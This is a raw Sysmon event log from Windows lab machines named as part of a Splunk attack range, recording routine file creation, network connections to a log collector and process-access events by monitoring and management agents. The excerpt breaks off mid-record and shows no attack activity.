23542300x800000000000000044110Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:34.187{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CC19040351861F569B8871DF3F9A9F6,SHA256=7283FFF8DEC1F2259C98D70CC924E9C7D90A44718056FD36C4194BAB7FBF644B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:35.692{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C9D1257E4920E40ADD9164F94D1FDA2,SHA256=FADDB2EA793633E8BA5FEBE931CF2D0BC81364A91FF2E92B44DD5BA899CE23EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044111Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:35.281{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA7729E3C0F9058D872679EADC79649,SHA256=31E58E22A606DCC444022DE14E091EBBDC059DCFF93023A4321AAA27A803ED86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:36.722{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D12AB2E935D4176FC6E1AD5F7E81C6,SHA256=53B4A3973A0961141493FAB18F4A6206BCA9E8E42BDF49BBD8B10F383A90DDB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044114Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:36.376{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=661F74FFE9D6C37426540457A5D1DA22,SHA256=15DD0F0A263878E52AB87C93129203B8DC35CE45409EEF32EB10A979682993F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044113Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:36.175{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-218MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044112Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:33.810{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52338-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000205241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:37.990{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cf1e0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd 10341000x8000000000000000205240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:37.990{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+cecc1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:37.990{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFd5fe78.TMPMD5=A303D473BA814FD6FAB43C1CB00819D2,SHA256=AA2A030E0B028A696C3F21587D451CD5CB68ED59621BA6CE0EF8E95415BF6D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:37.754{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4DC49CBB0633FAD72F0C24C97FA6D1F,SHA256=1FEA1B2583224E4D12D227E4B63F74647E50A90B507FFF40BE6B8B12087533F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044116Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:37.468{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC69B02045F5212D48F34D8ABAEEE860,SHA256=3FE5263378564ADE5A801F7E2C167290E1A64714FAFBB643B025FFC0BB98543C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044115Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:37.189{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-219MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:38.951{2E1864BB-E13E-6299-0D00-000000005F02}9126544C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2A00-000000005F02}2168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3d877|c:\windows\system32\rpcss.dll+29a97|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:38.873{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B9C8A3BF8F58A4F06F8889A806836C1,SHA256=7A6A29FB6689445C4BDFD210E9A262D1C5C37EDE2C4349210562CEF61775D890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044117Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:38.563{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF01CC0F7EAFBA884429815C81B9C573,SHA256=9BB541025EDB33C093F6888812F48D3C8F7DAA5C1670404F882D65C95E9F6094,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:36.731{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56365-false10.0.1.12-8000- 23542300x800000000000000044118Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:39.657{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB3AD1C97F2C116184D75FD58A77735,SHA256=B916198FF8077F08857AE449B7B006465B4942D47AC1F343928A44E181559B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044119Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:40.750{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C9854E48735B1C2E94D16116DFC574,SHA256=3D738DDC775A67EAD90DD5D210343CC52DB013480F7BC96F69A63527D1FA6C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:40.004{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96FE635A1B8386AF5FCD442123119733,SHA256=ABEAE2DE68B985C6ED462FC0CDF48335EB4E11185D866AD02CE4F4C96DB6763D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044120Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:41.844{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0957F7D39907C660BE79FDC5325DE374,SHA256=D427F5DAD38BB034C634826BE4517D1D5BFB0F59BC7B9B5497706D7735FCE203,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:41.135{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=839EEECADF94B2F8C26C6B4ABE83D8D0,SHA256=F5CB05B52DFF59A8902F711D66097267A46AE5B502A0FEE4F4E7B3BFD1BA7BF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044121Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:42.938{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E2B7358DC637C41F02EFE6BE5E1F1F,SHA256=52A0409B1A6D1B2682D22765EB3EE8A814B7566A017395159647682A77B28162,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:40.745{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56366-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:40.744{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56366-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000205248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:42.254{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4642433A059344FB4B67D7631A1D3F48,SHA256=1D571C704ACC098DF0FCC17B4D898DF72C628C5B4A3911DE47071B363749044B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:42.187{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55748A09E389FC75F80C01FDF9D980A2,SHA256=9727DD8B67A16DDF23B219AE25ACF6FA076B8AA4D3C689814B6172F2490D0929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:43.920{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=1D5F12638EFA9451755A793C180A3E35,SHA256=80AEFF8C46052DD3D6DA0502060F5FAE30CFE1F64C2FCE52D7E2928417AD5177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:43.274{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:43.204{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA790BF17A9CDCEEFE0A2A077145EBF,SHA256=BDA81019FC0D29B19767F43CF2CD5758FE8389CE3D524C4520E7C87C5D8215DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044122Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:39.811{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52339-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000205256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:42.860{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56368-false10.0.1.12-8089- 354300x8000000000000000205255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:42.744{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56367-false10.0.1.12-8000- 23542300x8000000000000000205254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:44.220{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4E7F45D5F0B4D76D2F65224C94CF30D,SHA256=36523CB0110CBAF0832363BE76DDCBA920DCA609E2E9EDB991C9CC67A5901A09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044123Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:44.032{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014064D40D2DA30C3A85610582C06776,SHA256=1268E4D0D9D6B0B07982FDD423D19CA6997619546AB92ECB520C61B9E287C6DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:45.272{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81690444CD8A44E5F5EB570A512E5F57,SHA256=FA95F903E5745B00543524453C37654FF28B88A1A57086A05CFEBA180B8CCD35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044124Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:45.125{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF45BA21908EEC431937C2FA5865C27E,SHA256=1317274897231A8FFB54181E915137D3E50AE946A2CAF09C75F12AA52D2F8549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:46.403{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C1A9A9654D93947D634284CFD9CD6A,SHA256=E850F81F961E7DB5344272955CC6B3893EC54B3CEC044FEE1C649B0BA53E046A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044125Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:46.219{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=276C863960A028CD747E663699CFC8F0,SHA256=AFBDA88EDDD46D5A99B3E3F464D650730D34614DA9C91E11554DA1BFEB52A5AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:47.433{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B28E6D40E0275EA72C9B6EEBB6BB9BE,SHA256=81469C3D9AC228F1AB0D82DD4F6D51DF904DAD280E77356B20A4DCC2ED58CD48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044140Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180B-629A-1407-000000006002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044139Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044138Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044137Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044136Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 